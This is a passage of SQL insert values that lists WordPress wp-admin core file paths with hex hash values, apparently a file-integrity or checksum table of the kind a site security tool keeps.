(0xf0ec81fc67cebb713b5da3ae486fbdc7, 'wp-admin/images/wp-badge.png', 1, 0x00000000000000000000000000000000, 0x73b244635671611458e874a20707135d),
(0x1afd36e3e97abf4119bde33a51fbcc09, 'wp-admin/images/wp-logo-2x.png', 1, 0x00000000000000000000000000000000, 0xe0c1cc94af35c8b495e35e9e6fbdad05),
(0x95027afb5068b573ed596886ffb665b3, 'wp-admin/images/wp-logo-vs-2x.png', 1, 0x00000000000000000000000000000000, 0x13e7ab1ac2f6c77f177c849576bfdf31),
(0x45dc17e0a2922a61c804c9cd83995b96, 'wp-admin/images/wp-logo-vs.png', 1, 0x00000000000000000000000000000000, 0xe8d9359697813d9df251808ec4b58b71),
(0x8070903b3769923ee7839b11d04c9348, 'wp-admin/images/wp-logo.png', 1, 0x00000000000000000000000000000000, 0x7052395c86de7a8a3c2328e7d134680d),
(0x80d3dabae8758fb6bf4d97c91df75b0d, 'wp-admin/images/wpspin_light-2x.gif', 1, 0x00000000000000000000000000000000, 0x450b52bd860e667a0fa3c00b82b58a18),
(0x0b22771d1725e25f83844b5ca0e175cb, 'wp-admin/images/wpspin_light.gif', 1, 0x00000000000000000000000000000000, 0x67f40a30bfa13743e5c4e86bfa467a90),
(0xfcbb3c6ce66117ac802c9b62582cb3b2, 'wp-admin/images/xit-2x.gif', 1, 0x00000000000000000000000000000000, 0xd9a81fb5a5e21e6d74a5e81ce37b421e),
(0x9da76dcc119cfd7a34e84ce4af04fa4b, 'wp-admin/images/xit.gif', 1, 0x00000000000000000000000000000000, 0xa815dc7ad6c4175e95bc48f3ab6832e9),
(0xd84d268f33160ddcc13315434d61517b, 'wp-admin/images/yes.png', 1, 0x00000000000000000000000000000000, 0xc42bf814a237dc89970d715ae8516b13),
(0x94c91e54b2a256a8edf4aa935c989705, 'wp-admin/import.php', 1, 0x00000000000000000000000000000000, 0x658c99d907b2b41c8d9a9101399d9f4f),
(0x4492c9f1bed5296261eb6bdac57bcbcb, 'wp-admin/includes/admin.php', 1, 0x00000000000000000000000000000000, 0x58ecd48329fdbea917ba958b9ddbca29),
(0xd2aa2a8fe3d41f489aaaa80a3b74b2fb, 'wp-admin/includes/ajax-actions.php', 1, 0x00000000000000000000000000000000, 0x9ea7414f15f024a90067b1d17ceb8ef8),
(0xb6b0ce9d48ba012ab6e12a2eda811f53, 'wp-admin/includes/bookmark.php', 1, 0x00000000000000000000000000000000, 0xe5218597c26d2bcfb7e5f0fdea3d286f),
(0x17a93a38cf1f4961f617b9c3b86cd56d, 'wp-admin/includes/class-ftp-pure.php', 1, 0x00000000000000000000000000000000, 0x94bf31cbecd68c79bc53c264be30f469),
(0xa56166683d46afd5de54d23afe9336b6, 'wp-admin/includes/class-ftp-sockets.php', 1, 0x00000000000000000000000000000000, 0x62be930a6d4f7ad4834dcffd23047d85),
(0xf105f8e59372702e187585337a78800b, 'wp-admin/includes/class-ftp.php', 1, 0x00000000000000000000000000000000, 0x799f2bb9dc00e511c67ccd87f96cf283),
(0xe71e1622d5c6a181fc9f173776732bf6, 'wp-admin/includes/class-pclzip.php', 1, 0x00000000000000000000000000000000, 0x01363728c843ff93e96b6983ce38eba6),
(0x1e8bf6c25965b8032ef00e3073049682, 'wp-admin/includes/class-wp-comments-list-table.php', 1, 0x00000000000000000000000000000000, 0xa3345c61a33aff2de4cf678638abd54a),
(0xe025e78f665c2b2c080285e6cd005c59, 'wp-admin/includes/class-wp-filesystem-base.php', 1, 0x00000000000000000000000000000000, 0xda97897fa2d9cd1f49dd9828b67f8834),
(0xca6846034d3c40602503712de3e61503, 'wp-admin/includes/class-wp-filesystem-direct.php', 1, 0x00000000000000000000000000000000, 0xc50b7b87079344d81984ed9356d6575f),
(0x36cca02cf5f85f908bec71f2eaf97585, 'wp-admin/includes/class-wp-filesystem-ftpext.php', 1, 0x00000000000000000000000000000000, 0x7e72c3f0c7cdc05fcf140e9a7b9c3931),
(0x9cd5138b800c50518b457c457d372b01, 'wp-admin/includes/class-wp-filesystem-ftpsockets.php', 1, 0x00000000000000000000000000000000, 0x0eea530efb679d48501ee1692b12877e),
(0xcdf889bb6a2867f91f807e6a5523b7d6, 'wp-admin/includes/class-wp-filesystem-ssh2.php', 1, 0x00000000000000000000000000000000, 0xc5a841378285b599d8f5b75d3a181033),
(0x767f5dbf7a8bf0d4e5039ac333bb7442, 'wp-admin/includes/class-wp-importer.php', 1, 0x00000000000000000000000000000000, 0xac69e3fe8d67c84d3155675ee6ddb98a),
(0x5fee9128ed43988cc21b4d360e9839c9, 'wp-admin/includes/class-wp-links-list-table.php', 1, 0x00000000000000000000000000000000, 0x1d0b0af2bdca7e0dfa65c44bdcaee40c),
(0x4f0987d253a0fd95c723c5ff5969f276, 'wp-admin/includes/class-wp-list-table.php', 1, 0x00000000000000000000000000000000, 0x8fa48e30952bded1cb99cdd8ad9e009a),
(0xb35662286b74885722ed36283bc6b4a0, 'wp-admin/includes/class-wp-media-list-table.php', 1, 0x00000000000000000000000000000000, 0x068742401c7de00075da848c17c32de6),
(0xaeeb8dfea7aaeae273709bd0e46510fc, 'wp-admin/includes/class-wp-ms-sites-list-table.php', 1, 0x00000000000000000000000000000000, 0x74f5fbd0a6d6f47f40cbd7b53ff5a279),
(0xe40c7706a21bcdd3d656a5d0ebbc21dc, 'wp-admin/includes/class-wp-ms-themes-list-table.php', 1, 0x00000000000000000000000000000000, 0x9b846d7b224146d3e6edc7bdee8bc746),
(0x06fcab6929331633dca5d1c773da2a17, 'wp-admin/includes/class-wp-ms-users-list-table.php', 1, 0x00000000000000000000000000000000, 0x0f9f4a3a5867a1c565addbbb76941a81),
(0x652e50c8b44e42875378115bdb26c1bc, 'wp-admin/includes/class-wp-plugin-install-list-table.php', 1, 0x00000000000000000000000000000000, 0x0c6abfb87230e98eabb2150d58f4acda),
(0xb88e94a79c5bae8f3a81b09784850f71, 'wp-admin/includes/class-wp-plugins-list-table.php', 1, 0x00000000000000000000000000000000, 0x99114ed86197646308916315d6944056),
(0xd747c8a9f5efbf3694a415b3c8000859, 'wp-admin/includes/class-wp-posts-list-table.php', 1, 0x00000000000000000000000000000000, 0xda02b071c913dd795f87e0fba48f6ac6),
(0x4c23d61fac2fdbb02accf833f2d2ec0d, 'wp-admin/includes/class-wp-terms-list-table.php', 1, 0x00000000000000000000000000000000, 0x6ecfe7075019da4182caeab0b9aeb698),
(0xac22da954b5b408947c70cfbe1e13991, 'wp-admin/includes/class-wp-theme-install-list-table.php', 1, 0x00000000000000000000000000000000, 0x2f434ca856989237df0d8a2faffa9463),
(0x2249466ebaa716adb840f761c27d9239, 'wp-admin/includes/class-wp-themes-list-table.php', 1, 0x00000000000000000000000000000000, 0x715342cabb3038247232e8066ed6d477),
(0x7aacf6d5ef4a58d4777b210d46abc0ba, 'wp-admin/includes/class-wp-upgrader-skins.php', 1, 0x00000000000000000000000000000000, 0xa5949a5c0343440f5edd348beca1b6b5),
(0x58c2d7df47b07fa60493f695e57a8458, 'wp-admin/includes/class-wp-upgrader.php', 1, 0x00000000000000000000000000000000, 0x15399b494761b7f4069fc267b682f3d0),
(0x90ddf2ae10961978385b01213e10f158, 'wp-admin/includes/class-wp-users-list-table.php', 1, 0x00000000000000000000000000000000, 0xd4a1b7bf4e676b87a1756075d0354e54),
(0x1e7cda26183b8c72a2020e4c7335f98a, 'wp-admin/includes/comment.php', 1, 0x00000000000000000000000000000000, 0xfd7d34c540008aa025476015fa61ebc4),
(0x336bada86f1c175791351b096b5b6d71, 'wp-admin/includes/continents-cities.php', 1, 0x00000000000000000000000000000000, 0x024b57d99bbe8b9e133316d1e98fc79d),
(0x5c9ad182923f241880cd8438c092a1e6, 'wp-admin/includes/dashboard.php', 1, 0x00000000000000000000000000000000, 0x5e8b2adf0546a623cf826a9eb01c50bb),
(0xf23fb2e2455f1ecf298a78da85249e9d, 'wp-admin/includes/deprecated.php', 1, 0x00000000000000000000000000000000, 0x4f29a78b550d1a2fcbdd02b8b561f67a),
(0x85b93ec141e40c42c737e5537a218865, 'wp-admin/includes/export.php', 1, 0x00000000000000000000000000000000, 0xb32b70e28fbb8b8a6f3220222e2daa3c),
(0x5154abf1f22a018f66d75084e5a52ebf, 'wp-admin/includes/file.php', 1, 0x00000000000000000000000000000000, 0x1de6121d861219158847576ab61db92f),
(0x93ab14378bd64523be77c5a76aafb2b2, 'wp-admin/includes/image-edit.php', 1, 0x00000000000000000000000000000000, 0xbba7396832b9b45c46ea95f72dd9ffdc),
(0x00c77c39e8d7758565e4f1e1964083b5, 'wp-admin/includes/image.php', 1, 0x00000000000000000000000000000000, 0x80706d6a5fb2244bb91355fe48cfaa70),
(0xd84105af682949881a5d4772def68345, 'wp-admin/includes/import.php', 1, 0x00000000000000000000000000000000, 0x611ec2ceceaaafffec7446ff9771b824),
(0xfe63b5d4776b9d2894910ff8348d33c3, 'wp-admin/includes/list-table.php', 1, 0x00000000000000000000000000000000, 0xedc0167837779fa6799a0fe8d521d6dc),
(0xfa01529cde3dfadd2ac964f2d56e0390, 'wp-admin/includes/media.php', 1, 0x00000000000000000000000000000000, 0xdc7e1b1ffdfc38a073a2c83e2ad3172a),
(0x9001060a99716fe3715a5679589cbf39, 'wp-admin/includes/menu.php', 1, 0x00000000000000000000000000000000, 0xf34ce73cebe5f2d2e75b77687e577f77),
(0x48c3bdcdf16919ed5abe552c4818bb4c, 'wp-admin/includes/meta-boxes.php', 1, 0x00000000000000000000000000000000, 0x83b9224b7fc3ee8d4722ed4435475f60),
(0x8631e4886555fc9d4d56fdb85e9a1499, 'wp-admin/includes/misc.php', 1, 0x00000000000000000000000000000000, 0x491b8e681a44b47939463572b420972a),
(0x89372afb8ff8227bec0bf3830a8d4b3c, 'wp-admin/includes/ms-deprecated.php', 1, 0x00000000000000000000000000000000, 0xfd75994da31324495fec77150b4adb5c),
(0x66a0e99cb066d89f7c68fbb955924c03, 'wp-admin/includes/ms.php', 1, 0x00000000000000000000000000000000, 0xb0748595be5258f5b988a4c3f958e97b),
(0x0328bf800497d199978dc9da00483c5f, 'wp-admin/includes/nav-menu.php', 1, 0x00000000000000000000000000000000, 0x75f5e6f0aa92c259f1437852aff14846),
(0x5297a77c52782fe3627a6e39002ad14a, 'wp-admin/includes/plugin-install.php', 1, 0x00000000000000000000000000000000, 0xd68b1dc76eba8a53a1aec89354345a72),
(0x71228d636febde19a33eab325268e95d, 'wp-admin/includes/plugin.php', 1, 0x00000000000000000000000000000000, 0xb027e48d2fed688fb8c37b2b26cc0674),
(0xc3d5c535db5622f3b0242411ee5f9dfd, 'wp-admin/includes/post.php', 1, 0x00000000000000000000000000000000, 0xd5d8c4595332a84912d1f426756ee63f),
(0x78965e6ddd5dccb29a2ff5c54c347655, 'wp-admin/includes/revision.php', 1, 0x00000000000000000000000000000000, 0x395ade7162d77e87e15290ac02f80c53),
(0xc7abc93dc5e86d04912fe01fc19c5e12, 'wp-admin/includes/schema.php', 1, 0x00000000000000000000000000000000, 0x524ab2dde3375c0e3f30aaf3d10f6c3b),
(0x2881a0ef08767c548fe2809420c2a5d4, 'wp-admin/includes/screen.php', 1, 0x00000000000000000000000000000000, 0xe80c6156cdda84e8856c78adced2492e),
(0x5aac8dcae8c420252fbb5abf7a39fdec, 'wp-admin/includes/taxonomy.php', 1, 0x00000000000000000000000000000000, 0xe480324d53dd3ba77e32e31144f39d16),
(0x3240dc6a0be56a00a16bd3b294a1d398, 'wp-admin/includes/template.php', 1, 0x00000000000000000000000000000000, 0x3d8582f4a1e92652748c6046d72ce9da),
(0x1093167e98e24cc9ce2ac42cc43c3aa5, 'wp-admin/includes/theme-install.php', 1, 0x00000000000000000000000000000000, 0xb83ab7508d46b753f2973ed9c1ac5308),
(0xe95d1ff7572f3eef7d3c38e8205646e3, 'wp-admin/includes/theme.php', 1, 0x00000000000000000000000000000000, 0x7ba931699c6630367788ef83f569414c),
(0xae0bcce45505792fff052a25fee5fd3b, 'wp-admin/includes/update-core.php', 1, 0x00000000000000000000000000000000, 0xbad12d7784b1d4935d8d228e0b5fbcfe),
(0xaa5d16da2ec71904310b0d5018584ca9, 'wp-admin/includes/update.php', 1, 0x00000000000000000000000000000000, 0xd8e04530c27e3ccac838718164379fdf),
(0xedf10fb2833dc3fa63e4d9879ce60bfd, 'wp-admin/includes/upgrade.php', 1, 0x00000000000000000000000000000000, 0x80234c95b55682da5d95317561ab4167),
(0x0651a120b7d4283bd8a07c7e5238bf62, 'wp-admin/includes/user.php', 1, 0x00000000000000000000000000000000, 0x001dad12de05767fc5ec8716c0172e8c),
(0xb4f049c7e5d8fb2e2455305d2788535f, 'wp-admin/includes/widgets.php', 1, 0x00000000000000000000000000000000, 0x3a38cfae6e870cd33c7483f6b0d2bbe6),
(0x9d92d1ba9f22cc5035ecd35e55811a69, 'wp-admin/index.php', 1, 0x00000000000000000000000000000000, 0x7ee7e442ceb932ad05bff3ad707b0575),
(0x42861217a16a088429dfd071bc448a53, 'wp-admin/install-helper.php', 1, 0x00000000000000000000000000000000, 0xaad2f4f8ef522b54a4324b01b2e7c447),
(0x9636b67c3bbe3b38c551b934996b85f6, 'wp-admin/install.php', 1, 0x00000000000000000000000000000000, 0x3ffcf1c81a5e27981d01fa61429848f4),
(0x2418f1ce603c15e19b11805d3f174c7d, 'wp-admin/js/about.js', 1, 0x00000000000000000000000000000000, 0x753ddfb43ade0f3fb4c00b010bdeec60),
(0xfc2df8bd4b5b0191f8eb8cb3d0e9df32, 'wp-admin/js/about.min.js', 1, 0x00000000000000000000000000000000, 0x5644f43ee3e5a30fdcd478cd44c698f5),
(0x7a3b6a325744ba36b28c115ba1170856, 'wp-admin/js/accordion.js', 1, 0x00000000000000000000000000000000, 0x481cc628a58bdbd7ac2e604321ae5fef),
(0xe95e2e976a547df93cde04048c49be99, 'wp-admin/js/accordion.min.js', 1, 0x00000000000000000000000000000000, 0xeb1fdf4f1d54234db56aaf3b979bb37f),
(0x9c3519f4870fac83dc0dbf18cb6bd4c4, 'wp-admin/js/color-picker.js', 1, 0x00000000000000000000000000000000, 0x585ead88e437e19591a6d8c43de2df50),
(0xe7cf48e2b6c7cd6cf6b17b214423af21, 'wp-admin/js/color-picker.min.js', 1, 0x00000000000000000000000000000000, 0x9bee909f1eff9d9228caf7768440f935),
(0x1c4303f02ff93b290e9faad991eeb06f, 'wp-admin/js/comment.js', 1, 0x00000000000000000000000000000000, 0x5a208e90699083d393803d2d3ae55d4c),
(0x51fda983cfdbc16cea149d67b42dc4f3, 'wp-admin/js/comment.min.js', 1, 0x00000000000000000000000000000000, 0x38ff692f79a3e57df9b9192a9e43b4ea),
(0x77fdfadaf2e1ca3a027d1956b910bc50, 'wp-admin/js/common.js', 1, 0x00000000000000000000000000000000, 0x35767af35006b75866e3a5806ab6496f),
(0xf2c2cc5f667f04c2a0181024c14f3c6f, 'wp-admin/js/common.min.js', 1, 0x00000000000000000000000000000000, 0x886b5ea55729f7016211cf324af5e897),
(0x640be3ecad31edecb5932d853b4f98f6, 'wp-admin/js/custom-background.js', 1, 0x00000000000000000000000000000000, 0x517aabb873f93a3ce7e5d6fa191bdbb9),
(0x8d7d208d79541e8eec5add488463444a, 'wp-admin/js/custom-background.min.js', 1, 0x00000000000000000000000000000000, 0xc0a9906e080e0d00b148d2353b5d6863),
(0x158f16dbde430a8e0c97e455be8416fc, 'wp-admin/js/custom-header.js', 1, 0x00000000000000000000000000000000, 0x955638fc743b925bb6425ac2c7e19903),
(0xa58ffc6e7670ac6584edc6d0eeca7de8, 'wp-admin/js/customize-controls.js', 1, 0x00000000000000000000000000000000, 0xab62b63d49366e5face06aa3e1547904),
(0xbfff64411f2385f6cd2ae782c5b96f37, 'wp-admin/js/customize-controls.min.js', 1, 0x00000000000000000000000000000000, 0xfff5ffc0860ce7ad5f84f4c35034fe57),
(0xe2e4c4b80f3adf2c70b431bfdb1b4872, 'wp-admin/js/dashboard.js', 1, 0x00000000000000000000000000000000, 0xfa45887a7cdd1c59785925aee26f900c),
(0xe4dfe6a8de7a704b43b27b5c3e82f390, 'wp-admin/js/dashboard.min.js', 1, 0x00000000000000000000000000000000, 0xd14c932322f06c464282544b020ab812),
(0x6025add6bde16aaeb12787d250f9b414, 'wp-admin/js/edit-comments.js', 1, 0x00000000000000000000000000000000, 0x88669276cac6721f2c39e4c7b09d9153),
(0x46d027a342a42fed34087b4acd7b1777, 'wp-admin/js/edit-comments.min.js', 1, 0x00000000000000000000000000000000, 0x93ce03b7394bab13fc1bb343d87f00d2),
(0x383dc049e5aff461f7259c836bd27eaf, 'wp-admin/js/editor.js', 1, 0x00000000000000000000000000000000, 0x8d7e42146c845324eb5781a7a985dee0),
(0xe6e2a3a3f44de54fd716baeeef8355ae, 'wp-admin/js/editor.min.js', 1, 0x00000000000000000000000000000000, 0x5d34ed8fe7919c5f5033866fcecdbe9a),
(0x3b52de79689beb9fd052784b8d111c0d, 'wp-admin/js/farbtastic.js', 1, 0x00000000000000000000000000000000, 0xa73af354a03241715d8698feea340b92),
(0x98c42f47ce9ed3b65bad13c79ceed943, 'wp-admin/js/gallery.js', 1, 0x00000000000000000000000000000000, 0xc46e25f07876b469e084d9b0696ea235),
(0xdb20e649d95f58b2d3039abc101ba83f, 'wp-admin/js/gallery.min.js', 1, 0x00000000000000000000000000000000, 0x7f4fb19184e149d7c0578c37983a258b),
(0x1d17475f620f63a92e2c5d2681c51ee8, 'wp-admin/js/image-edit.js', 1, 0x00000000000000000000000000000000, 0xabee7dc06e6c318e85deb3db101b518a),
(0xb5e31b2d5a08bcb38011023a45be3a1d, 'wp-admin/js/image-edit.min.js', 1, 0x00000000000000000000000000000000, 0x9bf2c46c35fc9f3c9ef2069137efd686),
(0x9b256ea9cd54df92095e04c76758ceb0, 'wp-admin/js/inline-edit-post.js', 1, 0x00000000000000000000000000000000, 0x7b3e501ec7c14ac0847c594e02ff3cfa),
(0xa331e06f1425a8c00471c5031541b580, 'wp-admin/js/inline-edit-post.min.js', 1, 0x00000000000000000000000000000000, 0xec79f4a3d602fc297468ee7db7d8516b),
(0xca28138671823450e87dfd354f7afc6b, 'wp-admin/js/inline-edit-tax.js', 1, 0x00000000000000000000000000000000, 0xa0c85dc2666073624ce26e38d36b32f3),
(0xf9a28db870f66c345bb2feb0659bdbfb, 'wp-admin/js/inline-edit-tax.min.js', 1, 0x00000000000000000000000000000000, 0xe152c4564839eea5d03f5c1f8f7f3304),
(0xf36c4691aebedc63eb9295d24cc180f8, 'wp-admin/js/iris.min.js', 1, 0x00000000000000000000000000000000, 0xd6537a873048d3725fb96cb99adc9b44),
(0xedb0515222e6c3400b331daaf676e053, 'wp-admin/js/link.js', 1, 0x00000000000000000000000000000000, 0x2ec8b32828bdd9f0d9efeff41bfe801e),
(0xda7cc023e91cd4b0239d7b95c4fe9fe1, 'wp-admin/js/link.min.js', 1, 0x00000000000000000000000000000000, 0xf9ff4694933001933bdec2c133b2252d),
(0x6e5a2f31543a7b265e842f086ebffd86, 'wp-admin/js/media-gallery.js', 1, 0x00000000000000000000000000000000, 0x365f0de914a67921ec1ca7f2c1f6c7fc),
(0x3a8c8ae525486021acfbe10d06e8805a, 'wp-admin/js/media-gallery.min.js', 1, 0x00000000000000000000000000000000, 0x3296d1fa20d292b002bba10490f1ba6e),
(0xd0d85eba5cb6580ce8507653ac5cf77b, 'wp-admin/js/media-upload.js', 1, 0x00000000000000000000000000000000, 0xa3767f4e61a7fd4fc7733fa50cffcf8d),
(0x81656cf704358f73989845efc3ba51e2, 'wp-admin/js/media-upload.min.js', 1, 0x00000000000000000000000000000000, 0x159be51feb8551297e0831216561c064),
(0x7289286ed59e90a8f36ae797df62220b, 'wp-admin/js/media.js', 1, 0x00000000000000000000000000000000, 0xcd257239f5da18126d80cef91c920c36),
(0xd79e947984376d4504359d83854f5fc1, 'wp-admin/js/media.min.js', 1, 0x00000000000000000000000000000000, 0x7f667bc10fca561ca610d12be057d75f),
(0xa9dc201dcd011fe71849743133052619, 'wp-admin/js/nav-menu.js', 1, 0x00000000000000000000000000000000, 0x2c6d5b682afadc134de7b46b1d201141),
(0xdd6685e39d18798efcac1bc4a7972a21, 'wp-admin/js/nav-menu.min.js', 1, 0x00000000000000000000000000000000, 0xf8c1f1f9fdc67b64689ad8cb43bcd7de),
(0x0eebe503220d4a00341eb011b92769b4, 'wp-admin/js/password-strength-meter.js', 1, 0x00000000000000000000000000000000, 0x9d7b4897e430c5470062141631ddf6cf),
(0xa8acccc880e77e5f71da49b6c45310a1, 'wp-admin/js/password-strength-meter.min.js', 1, 0x00000000000000000000000000000000, 0x66ceeaf9fb0d3e36069cb2a5b4537787),
(0x7436b7ee9e4f11ac0d618d8cc886eb66, 'wp-admin/js/plugin-install.js', 1, 0x00000000000000000000000000000000, 0x69fdd35fdcf30104974cfd8abba8fe0b),
(0x21f4ffb7ed59302d057a31e0646d3e87, 'wp-admin/js/plugin-install.min.js', 1, 0x00000000000000000000000000000000, 0x19f4f7ff991851e77513e7d65c6b0430),
(0x569e85ef168299eb8c8f24d8ef8c8a78, 'wp-admin/js/post.js', 1, 0x00000000000000000000000000000000, 0x3149dd38216585bd7d68e89da427cfb0),
(0x4d3f2c35d82aeef3c904fadc4b2ac566, 'wp-admin/js/post.min.js', 1, 0x00000000000000000000000000000000, 0x9341ffcbbe31f030b5555739ddee103b),
(0x50278328b502f4eb3f2b8b7ab49324a1, 'wp-admin/js/postbox.js', 1, 0x00000000000000000000000000000000, 0x7ea8bff0af625f7b182f4c0ed9c5b5a6),
(0x4facacfab352af72bea9a3e844953f97, 'wp-admin/js/postbox.min.js', 1, 0x00000000000000000000000000000000, 0x084dc85c20f5d1eb23a25441eaf714c7),
(0xbdb2bc5c869339bad195810146a077ed, 'wp-admin/js/revisions.js', 1, 0x00000000000000000000000000000000, 0xa005233637f6f2564e710a0e4a5b0e1f),
(0xf86be67f1401de12ba94653c46eada34, 'wp-admin/js/revisions.min.js', 1, 0x00000000000000000000000000000000, 0x2e3fc3b910c3ffa7dd0bd1b939f955a0),
(0x4bfa11da57ff2600004bb500368247f4, 'wp-admin/js/set-post-thumbnail.js', 1, 0x00000000000000000000000000000000, 0xc6d8c11219599e48d32cb3dbefe43d29),
(0x1c54cb67736c46eda2e6ca9ee0f54c79, 'wp-admin/js/set-post-thumbnail.min.js', 1, 0x00000000000000000000000000000000, 0x8bc5ca12fa38a607d5af2181311b7a5b),
(0x7b74c8457eaa7fcc50db41b431f8a003, 'wp-admin/js/tags.js', 1, 0x00000000000000000000000000000000, 0xd39bc622e41df37d3f5e2e8fd20df836),
(0xa2666b6a9212c24e89556569343d25c3, 'wp-admin/js/tags.min.js', 1, 0x00000000000000000000000000000000, 0x61be6f278a1f944b26447cdc26d835fe),
(0x4576dc08b11414328f5ad1e342c8f143, 'wp-admin/js/theme-preview.js', 1, 0x00000000000000000000000000000000, 0x36dabc552ff9315e1e782ad144ea383d),
(0x5e9faf565d794419ada87f0f4b741ddd, 'wp-admin/js/theme-preview.min.js', 1, 0x00000000000000000000000000000000, 0xe95ad5d62ad2871162b4636b2884d907),
(0xf3235cfab7e2a82f87760e0516581e52, 'wp-admin/js/theme.js', 1, 0x00000000000000000000000000000000, 0xa7f95c97f28986e4f7092dbc8678e9cf),
(0x473655e632001e3152fcb8938da2cf4a, 'wp-admin/js/theme.min.js', 1, 0x00000000000000000000000000000000, 0x45687c2857346504c9f1a30b53aac86f),
(0x81d6f084cb273e02e15b01bd9ece87f7, 'wp-admin/js/user-profile.js', 1, 0x00000000000000000000000000000000, 0x9e703dc5d5f400b0b22e2fcf6c3da6e8),
(0xf6a8a392c2fe4814a953213bf820f396, 'wp-admin/js/user-profile.min.js', 1, 0x00000000000000000000000000000000, 0x9eacd99637638c1827a085823204b32a),
(0x52c2a5f8b2aecdca4c65fd7109f026d4, 'wp-admin/js/user-suggest.js', 1, 0x00000000000000000000000000000000, 0xa475074c6a346983f461e0ee48269edb),
(0xd51658e9f0af97248461b2d442c8d25e, 'wp-admin/js/user-suggest.min.js', 1, 0x00000000000000000000000000000000, 0x77f81ca93899eaae1f67dbb695ead0e3),
(0x5251f7623766a714c8207c7edb938628, 'wp-admin/js/widgets.js', 1, 0x00000000000000000000000000000000, 0x8d63d1b5d33ddb3ce802d4b3101eecb4),
(0x10ae53781ec3df34ae406fc177ef0e4e, 'wp-admin/js/widgets.min.js', 1, 0x00000000000000000000000000000000, 0xc66c6985d272f6f4a4dfc947b8a132ed),
(0x5037336fe8a90209a7eb00e63de18ad2, 'wp-admin/js/word-count.js', 1, 0x00000000000000000000000000000000, 0x86f1a330bd23226e1e7f50887e7f9ab0),
(0x96e24367bfb8f11e8b7d1d7cc745f7fd, 'wp-admin/js/word-count.min.js', 1, 0x00000000000000000000000000000000, 0x5ecafe9ee88afb02ea468552f41c608d),
(0x6941687b8bcfe34d28827c4a2cd7e713, 'wp-admin/js/wp-fullscreen.js', 1, 0x00000000000000000000000000000000, 0x24644a8300d7318eefe876c659e57b3d),
(0x7daec2e9183e2f1f1af9c8ca2b69b856, 'wp-admin/js/wp-fullscreen.min.js', 1, 0x00000000000000000000000000000000, 0x1431f5bb512892f9e9f39a8d7ece041c),
(0x76e6fce1e234dd7c3e1ded3cb4ffc0a8, 'wp-admin/js/xfn.js', 1, 0x00000000000000000000000000000000, 0xd627144ce38e26b1b1fd91b5dcb503ff),
(0xe9a0bbc0794e3c8ea08039806f1a3c0c, 'wp-admin/js/xfn.min.js', 1, 0x00000000000000000000000000000000, 0x5467d9418e2842e476e453fd741fdbc5),
(0x7cfebb598c1c3ee080d01d09f9c686c4, 'wp-admin/link-add.php', 1, 0x00000000000000000000000000000000, 0x759747ef8d44c52fadcfa5c457f3f283),
(0x8542257636cd49224a62bdc734d3a154, 'wp-admin/link-manager.php', 1, 0x00000000000000000000000000000000, 0x31cbc00f8ac1ac6ac952dd0631ec7798),
(0xf60b807ea191e4e215bbe27284439b9e, 'wp-admin/link-parse-opml.php', 1, 0x00000000000000000000000000000000, 0x78c5e3ce311e4ef5ca9d9b40217260c4),
(0x3a0f7bc3e2ec7b37ca39b0899ff01f7f, 'wp-admin/link.php', 1, 0x00000000000000000000000000000000, 0x22705a4a42dbe388903dedb9676049c4),
(0x36825d6ae07619d957b96b0d332d7fe7, 'wp-admin/load-scripts.php', 1, 0x00000000000000000000000000000000, 0x5d28692c60cdcce6c2492fd94fdcb1eb),
(0x577d29d39637a38cea65e77d35e6392c, 'wp-admin/load-styles.php', 1, 0x00000000000000000000000000000000, 0xb161a1a3b8b0bbea88906221b48a18f6),
(0xb4d24bb4e7e74f05c89639d7337c3c8d, 'wp-admin/maint/repair.php', 1, 0x00000000000000000000000000000000, 0xc378b36e4c2f48503af47ff8c5b0527d),
(0x4a7ba3d6b9065a6906055ec3b9789549, 'wp-admin/media-new.php', 1, 0x00000000000000000000000000000000, 0x25629dfca39b4f0a0f73a6dfb84d8e77),
(0x86b311ac17ba12c3ea1982e2eb7d95cd, 'wp-admin/media-upload.php', 1, 0x00000000000000000000000000000000, 0x3a43d36fadf4f4ed587df16fe2aeeade),
(0xb9c38f754ce72cee9f26c7918b0d311e, 'wp-admin/media.php', 1, 0x00000000000000000000000000000000, 0xd4512397aae6b4788f7dfbce0cddee28),
(0xf0249fc4aba549885efd9333b794d112, 'wp-admin/menu-header.php', 1, 0x00000000000000000000000000000000, 0xf5a9d201f5c5fb2f9830a9f2063dfdd1),
(0xa8afdf5ce04420fc3efc46142cb587e7, 'wp-admin/menu.php', 1, 0x00000000000000000000000000000000, 0xdd5a18b07c91079cd0b2d1c5e766aa69),
(0x577bb0671b2d201458f2e9fb273d6e38, 'wp-admin/moderation.php', 1, 0x00000000000000000000000000000000, 0x541242a293805952a0e22234f09d6fa9),
(0x7677d9d140050f8848cac91e7a9646a6, 'wp-admin/ms-admin.php', 1, 0x00000000000000000000000000000000, 0x9a05b49740dfcdaf4516851b623606e4),
(0x266565ee0a334be812d4e3765a04a695, 'wp-admin/ms-delete-site.php', 1, 0x00000000000000000000000000000000, 0x977b3a05963768b447fb39b75821c7cf),
(0x45b856e0f3f72cd525a6d72c53124d3d, 'wp-admin/ms-edit.php', 1, 0x00000000000000000000000000000000, 0x16d42ff617c4a616c3bd94ba103a4582),
(0x22287d47c57fc572e7090230978e5628, 'wp-admin/ms-options.php', 1, 0x00000000000000000000000000000000, 0xa21d278e00ca7dccfe3a81d4e386afa9),
(0xaf2d31f038fc3ba754f6022f58e2a95d, 'wp-admin/ms-sites.php', 1, 0x00000000000000000000000000000000, 0x5d186224ebf4ddd0f1719c9ef4b80468),
(0x1c9db43d62a4369ade68738011aae674, 'wp-admin/ms-themes.php', 1, 0x00000000000000000000000000000000, 0x521cb94b9501ca24bc495a31c66925d8),
(0x5c16dcdc0e0f85958c398783b7c8ccf7, 'wp-admin/ms-upgrade-network.php', 1, 0x00000000000000000000000000000000, 0x7cb492260f22ee53816d96be3868be6d),
(0xb16bca06554c9fedc7a1b924c198fa7f, 'wp-admin/ms-users.php', 1, 0x00000000000000000000000000000000, 0x4823c8667b23ca83b31bf9093647e5a2),
(0x0d78dd8d815eb4a7bf1aa08302bd3c3b, 'wp-admin/my-sites.php', 1, 0x00000000000000000000000000000000, 0xa09c8a549f5a7639d0fd65e5e9489e5e),
(0x12b8b7e1436c6fa6081eb6b196afe9d2, 'wp-admin/nav-menus.php', 1, 0x00000000000000000000000000000000, 0x3e46af1c8b2c432a4802dde5c6523801),
(0xab6fa2f9a0b46c3ebce2787e49b020c2, 'wp-admin/network/about.php', 1, 0x00000000000000000000000000000000, 0xe9e33df9da15a95356e6da0e56889fec),
